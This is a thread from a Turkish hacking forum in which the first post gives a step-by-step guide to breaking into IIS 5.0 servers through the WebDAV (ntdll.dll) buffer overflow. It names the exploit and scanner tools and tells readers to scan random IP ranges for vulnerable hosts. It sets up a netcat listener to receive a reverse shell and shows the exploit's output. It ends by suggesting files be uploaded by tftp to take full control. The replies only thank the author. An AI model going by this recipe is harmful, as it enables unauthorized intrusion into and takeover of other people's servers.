İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

IIS 5.0 webdav açığı

05-06-2009 10:38
#1
atlas_tr - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2008
Nereden:
NErDe OLsam BEğeNİRsin
Mesajlar:
2.383
Teşekkür (Etti):
19
Teşekkür (Aldı):
189
Konular:
389
Ticaret:
(0) %
Hacking IIS 5.0
Burada yazdıgımız yöntem WebdaV açığını kullanarak sisteme girmekten ibarettir


DavS açığını bir çok arkadaş sadece sayfaları deface etmek için kullanıp duruyor halbuki bu açığı çok daha etkin şekilde kullanmak mümkün.Bu metoddan daha önce kimse bahsetmemişti.Bende yazma gereği duydum
1) Gerekli Programlar

1) xwbf-v0.3.exe (Webdav için Exploit)
2) PTwebdav.exe ** (Hedefin Vulnerable olup olmadıgını kontrol için)
3) A Scanner (IIS 5.0 Aramak için)
4) tftpd32.exe ** (tfpt server, dosya uploadı için)
5) Netcat (Port Listening işlemi için)

2)Vulnerable IIS 5.0 Arama


Superscanner yada başka bir scanner ı çalıştırıp,herhangi bir ip aralıgını 80. i port için aratıyoruz.
Örneğin bir tane ip buldugunuzda IP adresini PTwebdav.exe progrmaına yapıştırıyoruz ve check butonuna tıklıyoruz.Program IP yi kontrol ediyor ve eger açık varsa "Vulnerable" diye size belirtiyor.Eger "Not Vulnerable " derse açık yok demektir başka IP deniyoruz.

3)Exploiting Webdav


Şimdi netcati açıp 666 nolu portu dinleyeceğiz(eger router arkası iseniz,port forwarding yapmanız gerekecektir)

Şimdi Port listening olayı için DOS a çıkacağız.
Bunun için başlata tıklayın,ordan çalıştıra tıklayın ve "cmd" yazıp enterlayın(tırnaklar yok)
Sonra netcatin bulundugu klasöre geçin ve netcatin klasöründe şu komutu yazın

nc -l -vv -p 666

Eger "Listening on any [666]" gibi bir mesaj alırsanız port listening işlemimiz tamamdır.

Şimdi xwbf-v0.3.exe ile sistemi exploitliycez.
"Satan's IP" yazan yere kendi ip nizi yazınız.
"Target " yazan yere hedef sitenin ip sini yazınız.
Geri kalan ayarlara dokunmayınız."Exploit" butonuna basınız.Şimdi program işini yapmaya çalışıyor


Checking ntdll.dll buffer overflow .....CONNECTED
send evil buffer ........ NOT VULNERABLE
If you see this, the target is vulnerable:

Gibir birşey çıkarsa sistem vulnerable değildir.

Checking ntdll.dll buffer overflow .....CONNECTED
send evil buffer ........ VULNERABLE
Connecting to [ip address] .........CONNECTED
trying ret addr 0x00d000d0 .........DONE
Waiting for IIS to restart .........CONNECTED
trying ret addr 0x00d100d1 .........DONE

Gibi bir şey çıkarsa Açık mevcuttur.Artık yapmanız gereken beklemek.Bazen çok beklemeniz gerekebiliyor hatta o kadar beklemeye ragmen genede giremeyebiliyorsunuz sisteme nedeni ise meçhul.
Eger herşey tamamsa netcati açtıgımız DOS komut satırında hedef sistemin komut satırına düşmüşüzdür.

Burdan Sonra yapacaklarınız tamamen size aittir.örneğin tftpd ile sisteme dosya atıp örneğin server win2000 ise rootlayabilirsiniz.ya da başka şeyler yapmanız mümkün gerisi için de biraz araştırısınız bazı şeyler elde edersiniz.
Kullanıcı İmzası

05-06-2009 15:07
#2
Üyelik tarihi:
10/2007
Nereden:
Denizli
Mesajlar:
983
Teşekkür (Etti):
23
Teşekkür (Aldı):
48
Konular:
72
Ticaret:
(0) %
Paylaşım için saol
Kullanıcı İmzası
04-08-2009 09:34
#3
Üyelik tarihi:
07/2009
Nereden:
Yaşasıgı sehir:arada bul
Mesajlar:
195
Teşekkür (Etti):
2
Teşekkür (Aldı):
37
Konular:
24
Ticaret:
(0) %
süpersin
Kullanıcı İmzası
[b][Y][-][K][i][M][Y][A][S][A][L][A][L][i]
╠═╣╠═╣╠╣╠T.╠╣.T╣╠╣╠═╣╠═╣

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı